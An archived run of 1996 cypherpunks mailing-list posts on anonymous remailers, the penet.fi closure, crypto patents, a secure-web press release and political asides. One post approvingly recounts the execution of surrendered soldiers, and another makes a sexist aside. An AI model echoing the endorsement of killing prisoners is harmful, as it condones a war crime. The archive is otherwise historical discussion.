essentialy that the only way to solve it is to test all possible
passwords and strings...  which is...
(lets say a complexity of pw=7, str=6)
52^7 * 250^6 ~=10^26
I think that was somewhere near the number of electrons in the
universe :)

Anyway, just providing y'all with something to toy with....

Si.

Oh what a tangled web we weave, when we practice to deceive
Case in point - www.*.*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 11 Sep 1996 05:55:50 +0800
To: cypherpunks@toad.com
Subject: FW: Terrorists
Message-ID: <9608108423.AA842379241@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>Crypto anarchy means the undermining of governments, and hence handouts to
people by government. People will only move physically for physical jobs, and
not for handouts. People will flow to where the jobs are, and jobs will flow to
where the people are. Isn't this what we really want?

--Tim May

Absolutely. I get tired of living in a small city of only 3 million. And when
enough people have moved to urban areas cars will naturally become less useful
because we won't have the room or the time to use them for intracity travel.
Bicycle riding will then become the norm. And the weekend will be rotating with
1/7th of the population off on any given day so as to minimize the traffic loads
and make better use of available resources.

And power will concentrate in large organizations that will replace most of the
functioning of the government. A crescendo of self organized criticality. 

I don't know if reference to Crazy Eddie or a growing sand pile makes a better
oblique closing comment.

James

Got them Red China Blues...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Sep 1996 06:56:36 +0800
To: cypherpunks@toad.com
Subject: Re: China joins Singapore, Germany, ....
In-Reply-To: <2.2.32.19960910110046.00de3c78@panix.com>
Message-ID: <i2P2TD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:

> At 04:41 AM 9/9/96 -0700, Timothy C. May wrote:
> 
> >Prison sentences in Germany for those who reveal forbidden information
> >about "the Holocaust," 
> 
> In a country where you get 10 months for stabbing a famous tennis star in
> the back, prison isn't much of a penalty. 

I'm sure the sentense would have been different if she weren't a Slavic
untermensch, or if he were, say, a Turk.

A friend of mine related how his father - a Jew and a Soviet Army officer -
commanded a company in WW2. In 1944 they came across a church where over a 
thousand Nazi soldiers surrendered without reistance. He announced them "Ich
bin ain Jude" and had them all executed. I think he did the right thing.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Fabbro <afabbro@umich.edu>
Date: Wed, 11 Sep 1996 06:36:51 +0800
To: cypherpunks@toad.com
Subject: LEOs running anon servers?
In-Reply-To: <H2R1TD82w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.95.960910115139.6526I-100000@stimpy.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> There
> are a number of anonymous remailers out in cyberspace, but it has been
> stated by a knowledgeable source that a number of them are being operated
> by law enforcement agencies (presumably to troll for criminal activity). A


Can someone verify/discredit/comment on this statement?  Who is the
knowledgeable source?



 
Andrew Fabbro  [afabbro@umich.edu]  http://www-personal.umich.edu/~afabbro/
PGP mail preferred; finger afabbro@us.itd.umich.edu for key    
"A good marketing organization listens to its customers...WE HEAR YOU!"
		- the National Security Agency

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMjWOx7oWkgjb6N6dAQEK4QP9ETvg03QMpYw81FmXNl0vxbkYLk9wph74
/291PduW3+BkN17iKBBns6v//HrnZJIttMqG+7wLzrX+zt1OpspGJLjJm03P/m68
CQ8L2K3stOyYvSB/S63M449eC+QX9iNEFpLD/QNOv7JM4ZVgQvEvUH6STaxF+Ez4
ClypqKualSA=
=L3rM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 10 Sep 1996 20:29:43 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <9608098423.AA842308610@smtplink.alis.ca>
Message-ID: <32353B63.62319AC4@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
> 
> This may be a hopelessly naive question, but is it possible to refuse payment in
> cash? Is it really good for all debts public and private?
                                  ^^^^^

Legal tender is good for payment of debts (ie. a legal tender), but not
necessarily good for *creating* those debts.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 11 Sep 1996 07:31:17 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: TWA 800 - Serious thread.
Message-ID: <2.2.32.19960910190024.007245e4@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:30 PM 9/9/96 -0700, Dale Thorn wrote:

>If govt. protects its "sources and methods", however nefarious, to the 
>extent that the public is never asked to assent to these methods (even 
>though a few of us know about them anyway), then the public doesn't have 
>to become overtly cynical about what's going on.

But the public *is* asked to assent to those methods - your chance to vote
on them is known colloquially as "jury duty". 
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Wed, 11 Sep 1996 07:30:02 +0800
To: cypherpunks@toad.com
Subject: Can you trust your ISP?
Message-ID: <199609101903.AA03845@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


No.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 10 Sep 1996 20:59:18 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Crypto Num Mum, Hmm
In-Reply-To: <Pine.SUN.3.91.960909180122.23624B-100000@tipper.oit.unc.edu>
Message-ID: <32353E6F.63DECDAD@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero wrote:
> 
> It's kind of tempting to generate the key and certificate using this as q
> and the previous largest as p, if only for machismo at keysignings :-)

The machismo is that you know for sure your numbers are prime, rather
than being 99.999999% confident that they are.  It is not hard to
generate prime numbers this large, it's just hard to prove they are
really prime.  (Someobdy please correct me if I'm wrong about this).

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 11 Sep 1996 07:12:04 +0800
To: cypherpunks@toad.com
Subject: EFF & Penet
Message-ID: <199609101924.MAA29487@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


FYI: EFF is in contact with Julf, and helping him on an informal basis to 
examine his legal and media options for setting the record straight in 
re: the Observer attack on his and anon.penet.fi's character. (Most 
details are attorney-client priviledged, thus the brevity of this note.)

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 10 Sep 1996 21:11:33 +0800
To: Blak Dayz <102540.2453@compuserve.com>
Subject: Re: Satellite Movement?
In-Reply-To: <960909031224_102540.2453_HHV82-1@CompuServe.COM>
Message-ID: <32354236.695678E2@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Blak Dayz wrote:
> 
>         I was out buying groceries and after they scanned the shit through they
> told me that all the ATMs in the City were out due to connection problems. So i
> go home and start trying to scan for the shits and i cant find them. If anyone
> knows what the hell happened i would appreciate the details. I believe it may
> have been a solar flare that caused the companies to redirect their satellites.
> It would do me alot of help considering i had to pay CASH (i hate paper) for the
                                         
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> stuff and i would like to complain to the fucking JPL and satt. operators about
> them warning the public.

Haven't been lurking long, have you?

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 11 Sep 1996 07:14:13 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: strengthening remailer protocols
In-Reply-To: <Pine.SUN.3.95.960909120620.4743A-100000@eskimo.com>
Message-ID: <9609101751.AA00594@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:
>  How about a combination of the two?  Suppose Alice wants to
>  anonymously post a message and get replies.  She generates a
>  new RSA key, signs her post with it, and asks readers to send
>  encrypted replies to a server.  Then periodicly she sends a
>  one-time reply block to the server to retrieve the accumulated
>  replies.

I'd like to chime in and say that this is a really good idea.  Basically a  
nymserver that holds onto incoming mail until an e-mail arrives from the nym  
to retrieve it.

How would mixmaster be able to support one-time reply blocks?  If the nym's  
mailbox is larger than the mixmaster message size (pretty likely) and needs  
to be split up, then more than one reply-block is going to be required.   
Should the nym generate a big stack of reply-blocks/routing headers and send   
them in with the retrieval request?  I suppose the server could fillup as  
many mixmaster message parts as it had blocks, then append something like "15  
more messages waiting (32,082 bytes - Two More Reply Blocks Required)" and  
ship it off.

Reliability is a problem with remailers... what happens now if a remailer in  
your reply block goes out and you receive mail at your nym account?  Does it  
just disappear?  With this system you could have a simple ACK protocol to  
ensure reliable delivery of the mail.  A magic cookie would be appended to  
your retrieved mail, which the server would then hold onto (it would still  
count against your quota...).  The mail would be deleted once you sent back  
an ACK with the magic cookie.

Here is yet another good application for DigiCash.  The operator could offer  
free accounts with very small mailbox quotas, or charge for bigger accounts.  
 Message retrieval could also be charged, of course.  Another idea is that  
the sender could affix postage if they wanted their message to be appended to  
a full mailbox...

A service like this is no different from something like pobox.com, except  
that this service lets you pickup your mail through e-mail instead of POP.   
So I don't think the operator would/should incurr any more liability for what  
runs through the system than pobox.




andrew

p.s.
It would also be a cool thing, IMHO, for nym servers to bounce back an  
advertisement to everyone who sends mail to a nym....   A way to spread the  
word.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Wed, 11 Sep 1996 07:48:50 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: ALPHACIPHER - An unbreakable encryption program.
Message-ID: <9609102022.AA04467@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Now there's a business I'd like to get into.... reselling 
pseudo-random bit strings....

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: roy @ sendai.scytale.com (Roy M. Silvernail) @ smtp
Date: 09/10/96 07:14:33 AM
Subject: Re: ALPHACIPHER - An unbreakable encryption program.

-----BEGIN PGP SIGNED MESSAGE-----

In alt.security, survival@aa.net writes:

[ attribution scrambled ]

>> True, but somehow I have a feeling that Alphacipher is not a one-time
>> pad, and thus is breakable.
>
> This assumption is not true.  ALPHACIPHER is, indeed, based upon an OTP. 
> We've solved all of the problems associated with pad creation,
> distribution, packaging and many other concerns that have previously
> limited the use of a cipher in this class.

Their web page alludes to a OTP-like operation where you have to
purchase key "refills".  It doesn't say where they store the escrowed
copies of the key material.

> Visit our net page at http://www.aa.net/cyber-survival-hq for more
> information, and read the reply in response to the unfounded attack by
> Curtin, posted above.

I recommend this page, if only for the great conspiracy theory about
automated telephone line scanning.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw
X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk
b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ
0MlhN5IxIBk=
=y4kc
-----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 10 Sep 1996 22:55:56 +0800
To: cypherpunks@toad.com
Subject: Re: Movies
In-Reply-To: <ae5a173f1d021004da7a@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.960910132602.21229A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Timothy C. May wrote:

> is viewed as being essentially Mexican.  (Some great humor, too. And a good
> murder mystery. And a love story. Conspiracy, humor, murder, love...all the
> ingredients of a great story. All three major American races collide, and

I think the love ingredients, all too common in movies without adding
anything to the real story, are a pain in the behind. I usually channel-
surf during the coitus scene (one in every movie for the last year).
These things are just for wimmin. If a man wants to see love on the
screen, then there is the Hard Core stuff.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 11 Sep 1996 07:53:45 +0800
To: Germano Caronni <ghio@c2.net (Matthew Ghio)
Subject: Re: forward secrecy in mixmaster
Message-ID: <199609102058.NAA12310@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:29 PM 9/10/96 +0200, Germano Caronni wrote:
>Just a short note. The DH patent (#4200770), as held by Cylink expires at
>the 29th of april '97. Afterwards DH enters the public domain. That's a
>certain argument for using DH key exchange. RSA will go into the public
>domain somewhen in 2002, if I remember correctly.

The US patent for RSA expires September 20, 2000 according to Applied
Cryptography Second Edition, p474.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Tue, 10 Sep 1996 23:44:50 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists (fwd)
Message-ID: <Pine.LNX.3.94.960910140721.15483A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Schmidt wrote:
> 
> Perhaps my connection is only disrupted accidently, but
> I can't access www.xs4all.nl from one account
> (the two others still work).
> IP tried : 194.109.6.100
> 
> SPG: What is the 'new' IP ?

The numbers are rotating every hour, so i can send you 
a the ip-number every hour to trace to :)

> (I hope you don't think I'm a spy for
> the German Government :)

spy's are not interrested in ip-numbers i think.
 
> Perhaps this time we have to
> proove that it's impossible to
> block an IP/Web site, so that all govs
> get a clue about who inet works.

i think they have already or will be informed by
the ICTF in some day's. Look at:

	http://www.anwalt.de/ictf/_960910d.htm
 
Also note one of the first lines:
ACHTUNG: Dieses Dokument (einschließlich aller Anlagen) darf bis 
zu seiner Vervollständigung und Freigabe weder zitiert, 
in WWW-Server eingestellt, noch abgedruckt werden.

:)

Henk

ps. stephan, can you forward this to the list. I'm reading this list
on a server with mail2news, also as a newsgroup i cant reply to ;(





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Shantz <bshantz@nwlink.com>
Date: Wed, 11 Sep 1996 09:42:38 +0800
To: cypherpunks@toad.com
Subject: Re: Allo allo
Message-ID: <199609102243.PAA28093@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Sep 10 15:46:47 1996
Si_Druid wrote:
>in the day' i used to write some low level crypts that were relatively
> impossible to break...
> they were also impossible to decrypt, which meant that the only way to
> use them was to work forward....

Hmmmm.  "relatively impossible"   I feel so secure.

> mostly i did password encryption schemes, this one working the best:

I'm still partial to a one way hash.   

Brad

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjXv2a80j2q8tTgtAQFG7wQAlNFcTsiQ9q4xKXtquqgqxgE7NklvNpyc
t6+ssuDutHfDzniclF0+exNH2VxbPPsAp8V+vhmcqPmZe4nyM7FGnDYJyQ+fFDA7
MOZf0xSDtVjnM+nXqdkKDK3/PnXTIWs7RqrN+UjJrxulUvw2AXXI0XieUU0K7YbC
S7yi9Pv7sb4=
=HqKR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chester Lee <chet@uconect.net>
Date: Wed, 11 Sep 1996 11:25:11 +0800
Subject: No Subject
Message-ID: <199609101952.PAA00940@sun1.uconect.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 11 Sep 1996 10:16:06 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Child Porn as Thoughtcrime
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960910230913Z-66372@mail3.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From:	tcmay@got.net 
>
>My point is this: For anyone who claims that "thoughtcrime" is something
>the Evil Empire specialized in, i.e., totalitarian communist regimes, look
>to the enforcement of laws about what can be viewed or accessed from the
>United States. Thougtcrime.
>.........................................................................
>
>
>Those laws obviously (to me) don't have all that much to do with legality nor
>all that much with thought, either;  but more with a government aiming to
>"looking good" in front of an audience of voters, presenting an image of
>being more moral, or "better-than-thou" -  in front of other nations, etc.;
>that is, to gain favor, and therefore political support, from the Citizen
>Units by sounding like Mother Superior/fatherly figures who are going to look
>after All The Little Children (tm), plus all the similarly weak &
>dispossessed.   
>
>This posturing gives all the un-selfconfident people someone to look up to,
>even if they don't really get anything (their memories being too short to
>notice the failed promises, lack of follow-through, and blatant
>inconsistencies, not to mention the 'legal' crimes committed along the way).
>
>Many people seek after sympathy towards their feelings (present and/or future
>pain) more than to be respected for the ability to think.   I imagine this
>develops into a reduced sympathy towards certain kinds of thought or towards
>thinking per se, eventually, promoting a general atmosphere of tolerance for
>offenses like "thoughtcrimes".   
>
>And of course anyone who is free to think about anything & everything (who
>could therefore potentially think about what everybody else has forgotten)
>will seem dangerous to those who wish to appear to be in total, beneficent
>control.
>
>   ..
>Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 11 Sep 1996 09:17:29 +0800
To: cypherpunks@toad.com
Subject: QDY_nam
Message-ID: <199609101618.QAA19360@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, 30 August 1996: 
 
   "Enforcing Coherent Evolution in Dissipative Quantum 
   Dynamics" 
 
   Cirac, Pellizzari, Zoller 
 
      [Precis] The major obstacle to the preparation and 
      manipulation of many-particle entangled states is 
      decoherence due to the coupling of the system to the 
      environment. A scheme to correct for the effects of 
      decoherence and enforce coherent evolution in the 
      system dynamics is described and illustrated for the 
      particular case of the ion-trap quantum computer. 
 
   The preparation and manipulation of N-particle entangled 
   states is fundamental to the investigation of basic 
   aspects of quantum mechanics and is the basis of 
   applications such as quantum computation, teleportation, 
   cryptography. and spectroscopy. 
 
   The error correction schemes proposed so far have focused 
   on preserving a given entangled state (memory errors). We 
   introduce a method to correct for the effects of 
   decoherence in the dynamical proccss of preparation and 
   modification of entangled states (gate errors). We 
   illustrate our scheme in the context of the ion-trap QC. 
 
   ----- 
 
   This 4-page paper is packed with equations. We will scan 
   to JPEG for those without access to Science. Send us a 
   blank message with the subject:  QDY_nam 
 
   We have to enlarge the fine-print originals to make 
   readable images, usually in the 150kb range. Does anyone 
   know of a program to do text and equations for easy- 
   reading, easy access to a Web site? 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 11 Sep 1996 10:29:54 +0800
To: cypherpunks@toad.com
Subject: O'Reilly supports secure web server standards
Message-ID: <199609102320.QAA22357@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message



Date: Mon, 9 Sep 1996 18:47:29 -0700
From: Ellen Elias <elias@ora.com>
Subject: WebSite Professional Adds Digital Signature Technology

For Release September 10, 1996		
Ellen Elias
(707)829-0515 ext. 322
elias@ora.com
http://software.ora.com/

O'REILLY'S WEBSITE PROFESSIONAL ADDS SECURITY CAPABILITIES WITH
TERISA'S NEW DIGITAL SIGNATURE TECHNOLOGY

Sebastopol, CA--O'Reilly & Associates announced today that its WebSite
Professional(TM) product will support Terisa Systems SecureWeb
Documents(TM) (SWD) client. Terisa's software is provided as a browser
plug-in that works with WebSite Professional's enhanced server security
capabilities.

Terisa Systems SecureWeb Documents client, a pioneering technology that
enables Netscape browser users to send and receive verifiable Internet
documents, is currently in beta and due to ship Q496. These documents
are managed and stored on an enhanced security server such as WebSite
Professional. SWD, which plugs into the Netscape browser, is based on
the Secure HTTP (S-HTTP) cryptographic protocol standard, developed by
Terisa Systems. WebSite Professional's built-in S-HTTP support on the
server side works hand-in-glove with the SWD tool on the browser side.
Together, they enable a Web administrator to provide Web documents
which are safer than paper: readable only by specified users, from the
right source, and exactly as provided. SecureWeb Documents enables a
Web administrator to determine the exact visitors to a given site, with
the visitors' permission.

WebSite Professional is the first and only server currently supporting
Terisa's standards-based digital signature technology for the World
Wide Web. It is also one of the only leading servers to have built-in
S-HTTP security. In contrast with SSL, which establishes security at
the connection level, S-HTTP establishes security at the document
level. S-HTTP provides a range of security options for documents, from
digital signatures, as in SWD, to encryption.  

"SecureWeb Document and WebSite Professional together make electronic
commerce, as well as general document serving, much more secure for Web
server users and their site visitors," says Gina Blaber, Director of
Software Products at O'Reilly. "Our long history with Terisa Systems
underscores our mutual commitment to pushing the Web's capabilities
forward. SWD and WebSite Professional are among the very few Web
products that support S-HTTP, an important technology which greatly
increases security standards on the Web." 

In July, 1996, the Forrester report on Web Security stated: "In the
on-line world there is no sure way to know who is on the other end of
the network. In the physical world, consumers use identification cards
to prove their identity.  There are two critical pieces of technology
that solve this problem in the on-line world: 1) Digital Certificates
and 2) Digital Signatures." WebSite Professional and Terisa's SWD
combine to offer this critical technology in an affordable, useable
package on the Windows platform. 

About WebSite Professional
WebSite Professional, the second generation of the award-winning server
software WebSite, runs on Windows NT and 95. Its ease of use,
documentation, and features have been widely praised. In addition to
cryptographic security, WebSite Pro includes support for a wide range
of programming applications, Open Data Base Connectivity (ODBC)/SQL
integration through Cold Fusion Standard, a server-side Java
programming environment, three comprehensive books, and four software
development kits.  

WebSite Professional also includes all the features of its predecessor
WebSite 1.1, including the HotDog Standard HTML editor, WebView
graphical document and link viewer, and the Mosaic browser. Both are
products of O'Reilly & Associates, developed in cooperation with
independent developer Robert Denny and Enterprise Integration
Technologies (EIT), Inc./Verifone.

WebSite Professional's list price is $499, with upgrade pricing for
WebSite 1.1 customers available from O'Reilly for $99.  O'Reilly
Software Online (http://software.ora.com/) contains more information
about WebSite Professional, as well as O'Reilly's other software
products.  

About O'Reilly & Associates 
O'Reilly & Associates is recognized worldwide for its definitive books
on the Internet and UNIX, and for its development of online content and
software. O'Reilly developed the Global Network Navigator (GNN), a
pioneering web-based publication which it sold to America Online in
June, 1995. In addition to WebSite Professional and WebSite, the
company's other software products include WebBoard, a web-based
multi-threaded conferencing system, PolyForm, a web forms construction
kit, and Statisphere, a web traffic analyzer (to be released this
fall).

About Terisa Systems 
Terisa Systems, Inc., based in Los Altos, Calif., was formed in 1995 to
provide unified communications security solutions for the WWW. In early
1995, leading industry players such as America Online, CompuServe,
IBM/Prodigy, Netscape, RSA and VeriFone/EIT forged a common commitment
to WWW security by agreeing to pool both investment and technology in
Terisa Systems. Terisa Systems' mission is to create tools and
applications technologies that make secure Internet commerce possible.
Terisa Systems' customers and partners are WWW-based application
developers and vendors of commercial online services such as AOL,
CompuServe/SPRY, Novell, OpenMarket, O'Reilly & Associates, and Process
Software. The company is privately held. For more information on Terisa
Systems, visit http://www.terisa.com.  

WebSite Professional, WebSite, WebBoard, PolyForm, and Statisphere are
trademarks of O'Reilly & Associates, Inc.  All other names are
registered trademarks or trademarks of their respective companies.  

###

- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 11 Sep 1996 07:11:03 +0800
To: cypherpunks@toad.com
Subject: Ban CU Secrecy, Keep TLA's!
Message-ID: <199609101626.QAA19815@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   FiTi, 10 September 1996. 
 
 
   Call to abolish banking secrecy 
 
   By William Lewis in Cambridge 
 
 
   The UK government should take a lead and abolish banking 
   secrecy in its dependent territory offshore centres, a 
   former legal adviser to MI5 and MI6, the British 
   intelligence agencies, said yesterday. 
 
   Mr David Bickford, the first British intelligence lawyer 
   to speak publicly in the UK, said at a conference in 
   Cambridge, 50 miles north-east of London, that there 
   "appears to be no justification at all for offshore bank 
   secrecy other than to protect the criminal". 
 
   He said "offshore bank secrecy can and must be abolished" 
   and "the UK should be the first to abolish this secrecy 
   given their control of their dependent territory offshore 
   centres". 
 
   Mr Bickford, who now runs an international legal 
   consultancy, said "endemic corruption" is caused by 
   offshore secrecy, and it is "difficult to see why it is 
   tolerated by any other than those with an unlawful 
   disposition". 
 
   He said allowing countries to maintain offshore banking 
   secrecy is "a classic example of the corruptive influence 
   of organised crime". 
 
   Mr Bickford added that the "justification is put forward 
   at all is an example of the overwhelming subversive 
   corruptive influence of organised crime which has managed 
   to magic a seemingly acceptable position out of the sheer 
   weight of its financial proceeds from narcotics, fraud, 
   extortion and other criminal enterprise". 
 
   Mr Raymond Kendall, secretary general of Interpol told 
   the 14th International Symposium on Economic Crime that 
   governments should commit more resources and step up 
   co-operation to tackle the growing problem of 
   international corruption. 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Day <willday@rom.oit.gatech.edu>
Date: Wed, 11 Sep 1996 07:38:25 +0800
To: cypherpunks@toad.com (Cypherpunks mailing list)
Subject: Harry Browne a cryptographer
Message-ID: <199609102028.QAA13808@rom.oit.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's an interesting detail from an AP story:

A short time ago, at a computer terminal far, far away, Steve L. Dasbach wrote:
>From: 76060.3222@CompuServe.COM ("Steve L. Dasbach")
>Date: 10 Sep 96 14:32:09 EDT
>Message-Id: <57196.3235C30E@dehnbase.fidonet.org>
>To: LPUS-PRES@dehnbase.fidonet.org (LP business - presidential)
>Subject: APn Article on Harry Browne 
>
>   By KARIN MILLER
> Associated Press Writer
>   FRANKLIN, Tenn. (AP) -- 

>   Browne said he formed his attitude toward government when he entered the
>U.S. Army three years after high school and became a cryptographer.

The article didn't say anything more about his cryto past..

===
Will Day       <PGP mail preferred>           *  *  *  *  *  *  *  *  *  *  *
willday@rom.oit.gatech.edu                      HARRY BROWNE FOR PRESIDENT
http://rom.oit.gatech.edu/~willday/            http://www.HarryBrowne96.org/
OIT, Georgia Tech, Atlanta 30332-0715         *  *  *  *  *  *  *  *  *  *  *
  =->  Opinions expressed are mine alone and do not reflect OIT policy  <-=

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMjXPcBDHlOdPw2ZdAQHVZwP7Bd5FJ1Usgq7TIzOGofhuC1ihc687zLg/
pPxzR5/8DpHj6x7agdLnKyivBROX9aTE616pzgjOfqup+/VWHdxRbChJ/S0twrn0
QPWOq4hkvrm9ygJlUSzmGMBEv4BeT/IIITlwrGUo7jaMtvemKPHiNnfE3u+Ii6xr
b44iifT6ygg=
=E9oM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 11 Sep 1996 11:01:49 +0800
To: Law &amp; Policy of Computer Communications              <CYBERIA-L@LISTSERV.AOL.COM>
Subject: Re: shutting down anon.funet.fi -- tough case
Message-ID: <2.2.32.19960911000616.00711a9c@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:22 PM 9/10/96 -0500, gene o'regon  wrote:

>        the forced closing of the anonymous remailer from finland shows how
>the law has to adapt to the internet.  aside from the witch-hunt aspects of
>the case ["they are the biggest porno distributor, etc."], there is real
>substance to the claim that you can't just ignore blatant violoations of
>coyright law.

As I understand the situation, penet.fi wasn't forced to close but will
apparently be forced (again) to compromise the anonymity of one of its users
- and the operator, Johan Helsingus, chose to stop providing the service
because he isn't able to protect the privacy of the users. 

It also might be confusing to think about anon.penet.fi as a single "case",
since it's been the subject of frustration/attention from several directions
- the church of scientology, the government of Singapore, and the recent UK
newspaper article identifying it as a source of child porn. 

Further, I don't think there's been a real claim that penet or its
